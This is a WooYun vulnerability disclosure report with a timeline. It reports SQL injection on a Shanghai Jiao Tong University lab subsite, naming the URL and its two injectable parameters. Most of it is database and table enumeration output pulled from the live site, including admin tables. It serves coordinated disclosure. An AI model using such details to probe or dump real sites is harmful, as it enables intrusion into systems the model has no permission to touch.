WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reading -------- http://drop.zone.ci/
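2015-02-06: Details reported to the vendor; awaiting vendor handling
2015-02-06: Vendor confirmed; details disclosed to the vendor only
2015-02-16: Details disclosed to core white hats and experts in related fields
2015-02-26: Details disclosed to regular white hats
2015-03-08: Details disclosed to trainee white hats
2015-03-23: Details disclosed to the public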
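Multiple SQL injections on a Shanghai Jiao Tong University subsite
The affected subsite belongs to the Key Laboratory of Artificial Structures and Quantum Control (Ministry of Education), Shanghai Jiao Tong University:
http://klasqc.physics.sjtu.edu.cn/DetailInfo.php?id=78&num=22
Both the id and num parameters are injectable.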
available databases [2]:
[*] db_web_klasqc
[*] information_schema

Database: db_web_klasqc
[16 tables]
+---------------------------------------+
| Eadmin                                |
| Earticle                              |
| Efriendlink                           |
| Ehtmlcontent                          |
| Eteacher                              |
| admin                                 |
| article                               |
| articletype                           |
| earticletype                          |
| eimagelink                            |
| et                                    |
| friendlink                            |
| htmlcontent                           |
| im                                    |
| imagelink                             |
| teacher                               |
+---------------------------------------+

Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| PROFILING                             |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Database: db_web_klasqc
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| article                               | 116     |
| Earticle                              | 84      |
| articletype                           | 25      |
| earticletype                          | 21      |
| Eteacher                              | 14      |
| teacher                               | 14      |
| Ehtmlcontent                          | 12      |
| et                                    | 12      |
| htmlcontent                           | 12      |
| Efriendlink                           | 7       |
| friendlink                            | 7       |
| eimagelink                            | 5       |
| im                                    | 5       |
| imagelink                             | 5       |
| admin                                 | 2       |
| Eadmin                                | 2       |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 294     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| CHARACTER_SETS                        | 36      |
| TABLES                                | 33      |
| KEY_COLUMN_USAGE                      | 16      |
| SCHEMA_PRIVILEGES                     | 16      |
| STATISTICS                            | 16      |
| TABLE_CONSTRAINTS                     | 16      |
| SCHEMATA                              | 2       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-02-06 20:35
Thank you, we are handling it.
None yet